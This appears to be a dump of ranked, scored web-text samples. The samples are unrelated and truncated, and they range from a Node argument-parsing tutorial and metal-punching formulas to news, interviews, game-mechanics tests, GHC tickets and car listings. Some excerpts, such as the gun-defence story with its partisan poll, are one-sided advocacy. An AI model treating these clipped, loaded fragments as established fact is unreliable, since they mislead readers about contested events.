{ console.log('Buy more riffiwobbles'); } else { console.log('Sell the xupptumblers'); } + +Now you can run this script with --rif and --xup arguments like this: + +$./xup.js --rif=55 --xup=9.52 Buy more riffiwobbles $./xup.js --rif 12 --xup 8.1 Sell the xupptumblers + +I know you want to buy more riffiwobbles and sell your xupptumblers. + +Next, it supports short args: + +#!/usr/bin/env node var argv = require('optimist').argv; console.log('(%d,%d)', argv.x, argv.y); + +You can use -x and -y as arguments: + +$./short.js -x 10 -y 21 (10,21) + +Then node-optimist supports boolean arguments, both short, long and grouped: + +#!/usr/bin/env node var argv = require('optimist').argv; if (argv.s) { console.log(argv.fr? 'Le chat dit:': 'The cat says: '); } console.log( (argv.fr?'miaou' :'meow') + (argv.p? '.' : '') ); + +And now you can invoke the script with various options: + +$./bool.js -s The cat says: meow $./bool.js -sp The cat says: meow. $./bool.js -sp --fr Le chat dit: miaou. + +Next, you can easily get to non-hypenated options via argv._ : + +#!/usr/bin/env node var argv = require('optimist').argv; console.log('(%d,%d +================================================================================ +Rank = 71; Score = 880640.0 +<|begin_of_text|>How to Calculate Punching Force (Formula & Tonnage Calculator) + +Punching Force Calculation Formula + +If you punch round holes or square holes, or some other forms of holes through a given thickness of metal, you just want to know the force required to punch a hole in steel. + +You can calculate the punching tonnage been required with the help of the following punching force calculation formula (blanking force formula): + +Punching Force (KN) = Perimeter (mm) * Plate Thickness (mm) * Shear Strength (kn / mm2) + +Converted into metric tons: dividing the result of KN by 9.81 + +Perimeter: add up the continuous line forming the boundary of a closed geometric figure. + +Thickness: the thickness which will be piecing through by the punching mold. + +the thickness which will be piecing through by the punching mold. Shear Strength: The physical properties of the plate, determined by the material of the sheet and can be found in the material manual. + +Common materials’ shear strength are as follows: unit: KN/mm2 + +Aluminum Brass Low Carbon Steel Stainless Steel 0.1724 0.2413 0.3447 0.5171 + +e.g: If punching one square hole in the 3mm thickness low-carbon steel plate, side length 20mm, you will get: + +Perimeter = 20×4 = 80mm + +Thickness = 3mm + +Shear Strength = 0.3447kn/mm2 + +Punch Force (KN) = 80 x 3 x 0.3447 = 82.728 KN Convert into tonnage: 82.728 KN ÷ 9.81 = 8.43 Ton + +Punching Force Calculator + +P.S: If you want to calculate hydraulic press tonnage, you can use our hydraulic press tonnage calculator. + +Punch And Die Clearance + +The clearance between punch and dies is represented by the total difference, which is one of the critical factors in the punching process. + +For example, when using ø12 upper die and ø 12.25 lower die, the optimal clearance is 0.25mm. + +Improper clearance will reduce the die service life, or burrs and lead to secondary cutting, the irregular opening will increase the demounting force, etc. + +Besides, the die clearance is subject to the material and thickness, generally, for carbon steel plate, 12%-18% of the thickness is best. + +See also: + +If no special requirements in +================================================================================ +Rank = 72; Score = 876544.0 +<|begin_of_text|>Question: How many teachers still need to be hired at B.C. schools? + +a) A lot, considering students are already one month into the school year. + +b) Officially, 400, according to the number of postings on the B.C. Public School Employers’ website. + +c) Far more than that, given that some postings are for multiple specialist positions and on-call teachers. + +d) All of the above. + +The correct answer is d. And the reason is as complicated as the start of this school year has been. + +The Supreme Court of Canada ruling that reduced class sizes and required B.C. to hire 3,500 new teachers sparked unprecedented movement of teachers between education districts and a wave of new hires — which continues today. + +“It’s challenging to pinpoint exact numbers, because the posting process right now is very fluid,” said Janet Stewart, chief administrative officer of the Public School Employers’ Association. “It’s quite a bit of a domino effect. So, to be looking at the posting numbers tells a more complex story.” + +Stewart’s organization, which negotiates on behalf of school boards to get new teachers hired, said there are 400 postings for new teachers in B.C. right now. But each of those postings can represent multiple vacancies, and those vacancies can be for full-time, part-time or on-call work. + +ON-CALL TEACHERS IN HIGH DEMAND + +A Postmedia analysis of the postings on the website from early this week reveals vacancies for more than 900 full- or part-time jobs, in addition to 1,000 schools looking for on-call teachers. + +Stewart said some of those postings are technically filled because in some cases the temporary teacher currently in the classroom will be officially hired once the paperwork is completed. In other cases, the person temporarily filling the role doesn’t want the job permanently so new teachers still need to be found — often in specialist roles. + +Multiple school boards, including Burnaby, Coquitlam and the all-French Conseil Scolaire Francophone, have indicated multiple vacancies for bilingual teachers or librarians, which are always hard to find in B.C. + +“We definitely have higher volumes this year and we definitely have pressure points around those highly specialized positions in particular,” Stewart said. “I’m hopeful it will calm down (this month).” + +She also said that the data doesn’t mean 1,000 additional on-call teachers necessarily need to be hired in B.C., because schools share a pool of on-call teachers run by the district, and some work +================================================================================ +Rank = 73; Score = 868352.0 +<|begin_of_text|>it donated Rs 50 lakh + + +Naik’s now outlawed outfit + + +all premises of the NGO had been sealed in view of NIA raids + + +NEW DELHI: Controversial preacher Zakir Naik’s NGO Islamic Research Foundation (IRF) had allegedly offered a second donation of Rs 25 lakh to Rajiv Gandhi Charitable Trust (RGCT) in December 2011, months afterthat is already in the public realm.Documents seized during raids onshow that it had wanted the Rs 25 lakh donation to RGCT to be routed via Mumbai-based M H Saboo Siddique Maternity and General Hospital, but the hospital ended up utilizing the money itself after IRF kept vacillating on who should be the end beneficiary. Besides RGCT, it had also recommended Allahabad-based Kamla Nehru Memorial Hospital Society, and KARM, an NGO in Mumbai.Significantly, according to resolutions passed by IRF in June-July and November 2011, the two donations of Rs 50 lakh and Rs 25 lakh were extended to RGCT on the basis of applications received from the trust which has Congress president Sonia Gandhi and vice-president Rahul Gandhi on its board of trustees. This contrasts with Congress’s claim, made when the Rs 50 lakh donation became public, that it never solicited donation from IRF. RGCT did not respond to TOI’s queries based on the documents in its possession.When contacted, IRF spokesperson Arif Malik said that given that“IRF does not have access to its records and hence cannot check donations made in the past”.As per documents with TOI, in case of both the donations, applications were received from RGCT, New Delhi, and placed before IRF’s board of trustees.The papers show that IRF, at a meeting of its trustees in November 2011, passed a resolution stating that applications for medical and educational aid was received from M H Saboo Siddique Hospital, RGCT and Bandra Education Society.The meeting resolved to donate Rs 5 lakh to the hospital as medical aid and Rs 5 lakh to the society as educational aid. It “further resolved that Rs 30,00,000 be donated to M H Saboo Siddique... hospital out of which they should retain Rs 5,00,000 and further donate Rs 25,00,000 to RGCT.” According to the documents, Rs 30 lakh was given to the hospital vide cheque No.964635 dated December 19, 2011.While RGCT did not respond +================================================================================ +Rank = 74; Score = 868352.0 +<|begin_of_text|>My son, Matthew, commented to me this afternoon (August 20, 2005) that there aren't very many Friday-the-13ths. He said that for some reason it is unlikely for the 13th to fall on a Friday. He flipped through the calendar and noted that there are no more months this year in which the 13th falls on a Friday. + +The Frequency of Friday the 13th + +I said that, in fact, Friday is the most frequent day on which the 13th falls. He was very doubtful. That launched me into a lengthy discussion of the calendar, and how wonderful it is that there is an exact multiple of 7 days in 400 years. For your edification, here's a summary of it. + +Every fourth year is a leap year, so in 400 years there are about 300 years that have 365 days, and 100 years that have 366 days. + +Except... + +Every 100th year is not a leap year, so that makes 304 regular years and 96 leap years. + +Except... + +Every 400th year is a leap year (that's why 2000 was a leap year), so we have 303 regular years, and 97 leap years. We're done with the exceptions. Now here's the beauty part: 303 times 365 plus 97 times 366 is 146,097, which is an exact multiple of 7. That means the calendar repeats itself exactly, leap years and all, every 400 years. + +Spreadsheet Calculation + +It's not hard to write an Excel spreadsheet that calculates the frequency of the days of the week on which the 13th falls over the next 400 years. Here's how to do it. Start with the 13th of this month. Put that date in cell A1. (I put 8/13/2005 in that cell.) Then in cell A2, put the following formula: + +=DATE(YEAR(A1+30),MONTH(A1+30),13) + +Copy the contents of cell A2 down to all the cells from A3 through A4800. Now you have a table of the dates of all the 13ths of every month for the next 400 years. + +Next, in cell B1, put this formula: + +=MOD(A1,7) + +Copy that formula from B1 down to all the cells from B2 through B4800. Here, numbers from 0 to 6 represent the days of the week +================================================================================ +Rank = 75; Score = 864256.0 +<|begin_of_text|>Share + +tweet + +Are Germaine Greer and Richard Dawkins being transphobic? Johanna argues that their perspective is wrong because they both dehumanify gender and empty it of its subjectivity. + +Beyond calling transphobia “transphobia”, we have very few ways of describing what is specifically wrong with bigotism directed towards transgender people (or people perceived to be transgender). It’s a truism that trans-conversations take about six times as long as a normal conversation because we have to use and often explain so much jargon that is unfamiliar to most people and even may transpeople themselves. We need better, more concise and descriptively intuitive terms to describe the kinds of abuse we face to help educate others why they are wrong. + +For instance calling Greer’s words an assault would be disingenuous. They’re a presumably an honest opinion, and not really directed at any specific individuals, but rather are a discriminatory attitude and mode of thinking that she broadcast to the world. + +So what was she doing? Why was what she said so vile and objectionable? + +Simply put, she was attempting to take gender away from transpeople. We are labelled as (trans-)eunuchs by “de-gendering” us. Gender is a fundamental human characteristic. Everyone has one, and though most people have conventional binary genders, they are still within the spectrum of possible genders. No one tries to take cisgendered people’s gender away without an outcry! + +Hence, “degendering”. Adjective: to literally or figuratively attempt to remove a person’s self-determined gender and/or the act of physically removing gender characteristics from a person. + +So this is what Greer did wrong: “she degendered us”, and compare that idea to things like being “emasculated” or the kind of misogyny that insidiously devalues women. Because it really is the same thing just with a different target. + +We can also describe potential social-consequences of ‘degendering’ by comparing it to ‘outing’ someone, or stigmatising a skin colour, a religion or even being cis-gendered. “Degendering”, we argue, is what Richard Dawkins demonstrated with his tweet dated 5:34 am, 26th October, 2015. + +“Is a trans-woman a woman? Purely semantic. If you define by chromosomes, no. If by self-identification, yes. I call her ‘she’ out of courtesy.” + +This is not transphobia +================================================================================ +Rank = 76; Score = 860160.0 +<|begin_of_text|>925.2k SHARES Facebook Twitter + +A 13-year-old boy fended off two hardened felons who were attempting to break into his house by using his mother’s gun to protect himself while home alone. + +The boy saw the men breaking into the back of his home, “at which time he feared for his safety,” and grabbed his mother’s gun, the document states. He began firing at them, and the Sheriff’s office reported that they returned fire. + +In a heated shootout, the boy shot Brown three times, and Bennett drove him to the hospital where he later died. The gray Chevy Sonic they were driving had bullet holes in it from the boy chasing them, the affidavit states. + +Where was the media coverage of this brave young man’s heroic act, how about a Tweet from President Obama commending his bravery. Without the protection of his mothers gun the boy, and his mother, who was due home later that afternoon, would both be dead. + +According to reports the young boy, who is not being identified, was home alone when he grew suspicious of a car that pulled up outside around 1:30 p.m. Moments later, the two suspects went to the back of the house and attempted to break in, at such time, the boy, fearing for his safety, grabbed his mother’s handgun. + +take our poll - story continues below + +Will the media learn anything from their biased reporting of the Jussie Smollett story? Will the media learn anything from their biased reporting of the Jussie Smollett story? + +Will the media learn anything from their biased reporting of the Jussie Smollett story? * Yes, they've gotten so much wrong recently that they're bound to be on their best behavior. No, they suffer from a bad case of Trump Derangement Syndrome. Jussie who? + +Email * + +Name This field is for validation purposes and should be left unchanged. Completing this poll grants you access to Truth Uncensored updates free of charge. You may opt out at anytime. You also agree to this site's Privacy Policy and Terms of Use. + +As the suspects tried to break into the back of the house, the boy opened fire, but the suspects reacted by returning fire before fleeing from the scene. + +The boy chased the suspects out of the home and continued to fire as they fled in their vehicle. The boy, who was uninjured, then called his mother, who instructed him to call the police. + +Neighbor Debbie Griffin said she called police after hearing about six shots ring out. She added that +================================================================================ +Rank = 77; Score = 856064.0 +<|begin_of_text|>LAST STORM OF 2018 WE SWEAR NO HUBRIS HERE 2018-03-20 How deep is the snow on Jill's bucket? The snow on Jill's bucket is 2.57 inches deep. CELEBRATING 8 GLORIOUS YEARS OF INACCURATE TECHNOLOGY This page will refresh automatically every three minutes. DIHYDROGEN MONOXIDE! DIHYDROGEN MONOXIDE in its horrific SOLID FORM! FALLING! FROM! THE! SKY! Only DASA (the Delaware Aeronautics and Snow Administration) has the technology to measure this phenomenon accurately... + +You can't view this movie. Bummer. + +Snowfall by Hour + +Hour Inches Total [Earlier] 0.91 0.91 9pm 1.66 2.57 10pm 3.17 5.74 11pm 0.00 5.74 12am 0.00 5.74 1am 0.00 5.74 2am 0.00 5.74 3am -0.15 5.59 4am 0.00 5.59 5am -0.15 5.44 6am 0.00 5.44 7am 0.00 5.44 8am 0.00 5.44 9am 0.00 5.44 10am -0.30 5.14 11am -0.45 4.69 12pm -1.21 3.48 1pm -0.91 2.57 2pm -1.36 1.21 3pm 15.87 17.08 4pm -12.09 4.99 5pm 0.15 5.14 6pm 0.15 5.29 7pm -3.78 1.51 8pm -0.15 1.36 + +Colophon + +@boutell of P'unk Avenue coded this. Have a peek at the source code (no, I don't usually write PHP anymore). HTML5 video is generated with ffmpeg. (IE users: use IE9 or better.) + +Jill's equipment: "EVERYTHING I NEED IN THE UNIVERSE is a Logitech C270 cheapo webcam, a new sexy piece of software called Willing Webcam +================================================================================ +Rank = 78; Score = 851968.0 +<|begin_of_text|>2.0.6 REND + +In patch 2.0.5, Rend´s ability to crit was removed. Instead, crit chance and crit damage were directly included in calculating its damage. + +Expected Mutilate damage per tick based on patch 2.0.5 changes = 1694 * 76.45 * (1 + 0.35*4.5) * 0.4 = 133,391.489 + +Actual ingame values in patch 2.0.6: + +> damage tick reflected on monster health bar numbers = 133,392 (12 frames, non-crit) + +> damage tick reflected on monster health bar numbers = 733,656 (12 frames, crit) + +> damage tick displayed above monster = 533,566 (48 frames, crit) + +>damage tick displayed above monster = 2,934,613 (48 frames, crit) + +Conclusion: Rend is now able to crit again on top of crit mod*** being included in its damage calculation. This means that a crit Rend benefits from crit damage twice (squared). A similar behavior was confirmed in the past for certain weapon procs like Odyn Son, Bul-Kathos´s Oath and Maximus fire chain. The difference between these calculations is that Rend doesn´t benefit from attack speed at all while the aforementioned item procs do (aps is also directly included in their damage calculation instead of affecting their tick frequency). On the other hand, the weapon procs don´t benefit from elemental skill bonuses while Rend does (from physical). + +***crit mod = 1 + crit chance/100 * crit damage/100 + +It is unclear whether this is an intended change to make the skill competitive again or just a "bug" byproduct of making the Rend damage bonus on gear work again. + +1. Furious Charge alternates hands to deal damage. Had to retest because some people were doubting this. Next time simply equip a white weapon in your OH and use a skill twice in a row. If there´s a huge damage difference, the skill alternates damage. + +2. Rend: + +> displays a white damage number above monsters 53 frames after fury globe response (skill cost) / hitting the target. + +> subsquent displayed ticks occur in 48 frame intervals and you always get 7 ticks total. + +> the last displayed tick is logically always smaller than the others + +> displayed tick sequence: 160%-160%-160%-160%-160%-160%-40% weapon damage +================================================================================ +Rank = 79; Score = 851968.0 +<|begin_of_text|>0 + +From co-creators Ryan Murphy and Brad Falchuk, the FX series American Horror Story uses a unique and compelling approach to television, with a different setting, different characters and a rotating cast of actors for each season. For Season 3, American Horror Story: Coven has told the secret history of witches and witchcraft in America, with a cast of talented actresses that included Jessica Lange, Kathy Bates, Angela Bassett, Patti LuPone, Sarah Paulson, Frances Conroy, Lily Rabe, Taissa Farmiga, Emma Roberts, Gabourey Sidibe and even Stevie Nicks. + +During this exclusive phone interview with Collider, actress Angela Bassett talked about how she came to be a part of the show this season, how it was the best of all worlds, bringing the history of the real woman to her portrayal in the present day, talking to actual voodouns, how invaluable it was to really get to shoot in New Orleans, and that she would absolutely be willing to entertain the idea of returning to the series, for a future season. Check out what she had to say after the jump. + +Collider: How did you come to be a part of the show, this season? + +ANGELA BASSETT: My agent reached out to Ryan [Murphy] and said, “What about Angela, for American Horror Story?” And he was like, “Yes, because she’s who I’m thinking of for Marie Laveau.” So, they reached out to me and said that I should go in and take a meeting with him for the character. I didn’t know that I was his choice for that. I was familiar with the show, but I hadn’t watched it because I don’t really like horror shows, horror movies, or any of that. I’m really a lightweight, in terms of that. But, I watched both seasons before going in to meet him. And I’m definitely a fan of Marie Laveau and New Orleans. What I saw, in addition to the horror, was that the writing was so wonderful and the characters were so realized. It wasn’t just fright night, so I could appreciate that. So, I went in to meet him and he told me what he wanted to do. New Orleans is one of my favorite cities, and I knew something about the historical figure of Marie Laveau, so I was excited about that, and I think he could see that in me. I don’t think the country, as a whole, +================================================================================ +Rank = 80; Score = 847872.0 +<|begin_of_text|>Share + +So how big is it, exactly? Well, according to our best estimates, the supermassive black hole is roughly 21 billion times the size of the Sun, and its event horizon (an area so dense and powerful that light can’t escape its gravity) measures 130 billion kilometers in diameter. That’s about 15 times the diameter of Neptune’s orbit around the Sun, according to scientists at the Hubble Space Telescope. At one point, the black hole was fueling itself on a process called hot accretion. Space stuff like gases, dust, and galactic debris fell towards the black hole and created an accretion disk. Then that spinning disk of space junk, accelerated by the strong gravitational pull of the largest known black hole, emitted huge jets of energy out into the galaxy. + +During that active period, NGC 4889 would have classified as a quasar (quasi-stellar radio source) thanks to the black hole’s emissions of up to a thousand times more energy than our Milky Way galaxy. But the black hole is now in dormant mode because there isn’t any more sustenance stored in the orbiting accretion disk. “The accretion disk sustained the supermassive black hole’s appetite until the nearby supply of galactic material was exhausted. Now, napping quietly as it waits for its next celestial snack, the supermassive black hole is dormant”, says the Hubble Space Telescope website. + +Of course, the announcement posted with new photos of the NGC 4889 galaxy is quick to point out that the pictures don’t exactly capture the likeness of the supermassive black hole. It is impossible to observe a black hole directly, but scientists have been able to identify the implied presence of a black hole by analyzing the way celestial objects interact with some invisible force. For this particular black hole in the NGC 4889 galaxy, scientists used instruments on the Keck II Observatory and the Gemini North Telescope to measure the velocity of stars moving around the center point of the galaxy. The stars’ specific velocities re what allowed scientists to calculate the incredible size of NGC 4889’s black hole.<|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|> +================================================================================ +Rank = 81; Score = 819200.0 +<|begin_of_text|>I'm looking for a way to test whether or not a given string repeats itself for the entire string or not. + +Examples: + +[ '0045662100456621004566210045662100456621', # '00456621' '0072992700729927007299270072992700729927', # '00729927' '001443001443001443001443001443001443001443', # '001443' '037037037037037037037037037037037037037037037', # '037' '047619047619047619047619047619047619047619', # '047619' '002457002457002457002457002457002457002457', # '002457' '001221001221001221001221001221001221001221', # '001221' '001230012300123001230012300123001230012300123', # '00123' '0013947001394700139470013947001394700139470013947', # '0013947' '001001001001001001001001001001001001001001001001001', # '001' '001406469760900140646976090014064697609', # '0014064697609' ] + +are strings which repeat themselves, and + +[ '004608294930875576036866359447', '00469483568075117370892018779342723', '004739336492890995260663507109', '001508295625942684766214177978883861236802413273', '007518796992481203', '0071942446043165467625899280575539568345323741', '0434782608695652173913', '0344827586206896551724137931', '002481389578163771712158808933', '002932551319648093841642228739', '0035587188612099644128113879', '003484320557491289198606271777', '00115074798619102416570771', ] + +are examples of ones that do not. + +The repeating sections of the strings I'm given can be quite long, and the strings themselves can be 500 or more characters, so looping through each character trying to build a pattern then checking the pattern vs the rest of the string seems awful slow. Multiply that by potentially hundreds of strings and I can't +================================================================================ +Rank = 82; Score = 819200.0 +<|begin_of_text|>Share + +Apple is known for its crazy patents, but some of them are much more realistic. On Tuesday, the U.S. Patent and Trademark Office granted the company a patent for a special construction process that involves LiquidMetal and sapphire glass displays. The patent approval occurred right after Apple announced that it has exclusive rights to LiquidMetal’s unique alloy until 2015. + +In scientific terms, LiquidMetal is a bulk amorphous alloy and is considered an exotic metal. It may look like a metal in liquid form, but it moves like molten plastic. So far, LiquidMetal has only been used to make a SIM card ejector, some military equipment, and medical devices. The technology has been put to the test, but it has never been used to create a consumer smartphone or tablet. Nonetheless, it seems that Apple may have plans to forge its future iPhones and iPads using the LiquidMetal technology. + +Apple’s patent describes the new use it has in mind for LiquidMetal and how it will aid in stabilizing the sapphire glass displays in future iDevices. Stabilization is necessary, so that when you inevitably drop your iPhone, the glass doesn’t shatter or simply pop off. Back in 2007, Apple used a plastic chassis and a rubberized gasket to protect the display from sudden impacts. This technology is still used in all other iPhone models up to the iPhone 5S. + +The new patent aims to avoid all these annoying in-between steps and go directly from the metal chassis to the display, using LiquidMetal in a new metal injection molding process. That way, Apple can form sapphire glass directly into the iPhone or iPad’s metal bezel. The patent indicates that plastic can also be used, but the emphasis is on the idea of using LiquidMetal to ensure the strongest bond and protection between the glass display and metal chassis. + +Clearly, this technology is very cutting edge, but its application is untested in mobile devices, so don’t get too pumped up, thinking LiquidMetal will debut with the iPhone 6 this September (or August, depending on which rumors you believe. Read our roundup here). However, given Apple’s agreement with GT Technologies to manufacture enormous amounts of sapphire glass, it’s probably safe to assume that a sapphire glass display is forthcoming on the long-awaited iPhone 6.<|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|> +================================================================================ +Rank = 83; Score = 815104.0 +<|begin_of_text|>March 26, 2013 + +STATS COMPARISON Points + +70 58 FG Made-Attempted + +20-52 24-61 FG Percentage + +.385.393 3PT Made-Attempted 6-16 2-20 3PT Percentage.375.100 FT Made-Attempted 24-30 8-14 FT Percentage.800.571 Rebounds 36 36 Turnovers 13 12 + +STAT LEADERS Kemp 20 Points 12 Cormier Sampson 11 Rebounds 8 Cormier Paul 9 Assists 6 Williams Three Tied 2 Steals 3 Cormier Kemp 3 Blocks 2 Brooks + +MEN'S BASKETBALL CENTRAL + +? 2012-13 Roster + +? 2012-13 Schedule + +? 2012-13 Stats + +? Gameday Central + +? Media Almanac + +@ecupiratehoops on Twitter | ECU Men's Basketball on Facebook + +GREENVILLE, N.C. --- Maurice Kemp scored 20 points and Robert Sampson posted a double-double to lead East Carolina past Loyola (Md.) in a CIT quarterfinal Tuesday inside Williams Arena at Minges Coliseum. + +The Pirates (21-12) will host Evansville in the final four round of the CIT Saturday at 5 p.m. The Purple Aces advanced to this weekend's semifinal with an 84-83 win over Cansisius on Tuesday in Buffalo. + +Kemp posted his seventh consecutive 20-point game, scoring 10 points in each half. Sampson finished with 13 points and 11 rebounds for this sixth double-double of the season with Miguel Paul adding 12 points and nine assists. + +Dylon Cormier led the Greyhounds (23-12) with 12 points, while Robert Olson added 11 off the bench. Anthony Winbush had 10 points. + +Coming out of halftime, Loyola scored the first six points and caused ECU to take an early timeout. The Pirates scored six straight points out of the timeout, tying the game at 38. + +The two teams traded baskets for the next several minutes and when the under-12 media timeout came Loyola held a 45-44 lead but then Kemp took the lead back for ECU for good. + +Kemp scored seven of the next nine points, including the first five, and the Pirates went ahead 53-45 on a one-handed dunk from the Miami, Fla. senior. + +L +================================================================================ +Rank = 84; Score = 815104.0 +<|begin_of_text|>McClure's Magazine Archives All Years = 242 Issues, 3,310 Articles Decade 1890s = 77 Issues, 923 Articles Year 1893 = 7 Issues, 87 Articles Year 1894 = 12 Issues, 142 Articles Year 1895 = 11 Issues, 133 Articles Year 1896 = 12 Issues, 137 Articles Year 1897 = 11 Issues, 140 Articles Year 1898 = 12 Issues, 148 Articles Year 1899 = 12 Issues, 136 Articles Decade 1900s = 119 Issues, 1,696 Articles Year 1900 = 11 Issues, 138 Articles Year 1901 = 12 Issues, 165 Articles Year 1902 = 12 Issues, 161 Articles Year 1903 = 12 Issues, 171 Articles Year 1904 = 12 Issues, 169 Articles Year 1905 = 12 Issues, 161 Articles Year 1906 = 12 Issues, 166 Articles Year 1907 = 12 Issues, 176 Articles Year 1908 = 12 Issues, 193 Articles Year 1909 = 12 Issues, 196 Articles Decade 1910s = 46 Issues, 691 Articles Year 1910 = 12 Issues, 184 Articles Year 1911 = 12 Issues, 173 Articles Year 1912 = 12 Issues, 171 Articles Current Issue Current Article Year 1913 = 10 Issues, 163 Articles + +Show More Show All Finding... Find More + +Email This Page to Someone Your Name Your Email + +Message Included Remember My Information + +Here's something interesting from The Unz Review... + +Recipient Name Recipient Email(s), separated by semicolons + +=> + +Contents + +Tree + +PDF Pagehit + +Search<|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|> +================================================================================ +Rank = 85; Score = 806912.0 +<|begin_of_text|>Applicative do-notation + +This is a proposal to add support to GHC for desugaring do-notation into Applicative expressions where possible. + +It's described in some detail in the paper: ​Desugaring Haskell’s do-notation Into Applicative Operations (ICFP'16). + +An implementation was merged for GHC8: ​https://github.com/ghc/ghc/commit/8ecf6d8f7dfee9e5b1844cd196f83f00f3b6b879. + +See also RecursiveDo + +Tickets + +Use Keyword = ApplicativeDo to ensure that a ticket ends up on these lists. + +Open Tickets: + +#10892 ApplicativeDo should use *> and <* #10976 Applicative Comprehensions #11982 Typechecking fails for parallel monad comprehensions with polymorphic let (GHC 7.10.3 through 8.6.3) #13309 Use liftA2 in ApplicativeDo #13511 ApplicativeDo return case doesn't handle lets #13905 ApplicativeDo is too strict with newtype patterns #13906 ApplicativeDo doesn't handle existentials as well as it could #14252 ApplicativeDo: Add compiler message about irrefutable pattern matches and Monad constraints #14700 ApplicativeDo in MonadComprehensions #15016 Referencing a do-bound variable in a rec block with ApplicativeDo results in variable not in scope during type checking #15100 `ApplicativeDo` needlessly uses `join` too much #15344 ApplicativeDo seems to prevent the fail method from being used #16135 Panic with ExistentialQuantification and ApplicativeDo #16171 "ApplicativeDo" disables -Wunused-do-binds? + +Closed Tickets: + +#11607 ApplicativeDo easily foiled with `pure` #11612 Bug in ApplicativeDo #11835 ApplicativeDo failed to desugar last line with pure $ #12143 ApplicativeDo Fails to Desugar'return True' #12490 With RebindableSyntax, ApplicativeDo should eliminate return/pure #13242 Panic "StgCmmEnv: variable not found" with ApplicativeDo and ExistentialQuantification #13648 ApplicativeDo selects "GHC.Base.Monad.return" when actions are used without patterns. #13875 ApplicativeDo desugaring is lazier than standard desugaring #14105 ApplicativeDo causes GHC panic on irrefutable list pattern match #14163 Stack +================================================================================ +Rank = 86; Score = 802816.0 +<|begin_of_text|>https://static.cargurus.com/images/forsale/2019/01/22/02/37/2005_honda_s2000-pic-2723864334431052518-152x114.jpeg 2005 Honda S2000 Roadster Used Cars in Cocoa, FL 32926 Great Deal $5,419 BELOW CarGurus IMV of $17,918 Price: $12,499 Mileage: 80,309 Location: Cocoa, FL 32926 Certified Pre-Owned: No Transmission: 6-Speed Manual Overdrive Color: Sebring Silver Metallic Description: Used 2005 Honda S2000 Roadster for sale - $12,499, 80,309 miles with Leather Seats, Alloy Wheels Avg. Dealer Rating: (10 reviews) "Bought the truck love it " + +https://static.cargurus.com/images/forsale/2019/02/24/02/41/2003_honda_s2000-pic-3958452991137935484-152x114.jpeg 2003 Honda S2000 Roadster Used Cars in Roselle, IL 60172 Great Deal $5,425 BELOW CarGurus IMV of $13,925 Price: $8,500 Mileage: 98,454 Location: Roselle, IL 60172 Certified Pre-Owned: No Transmission: 6-Speed Manual Color: L Blue Description: Used 2003 Honda S2000 Roadster for sale - $8,500, 98,454 miles with Leather Seats, Aluminum Wheels Avg. Dealer 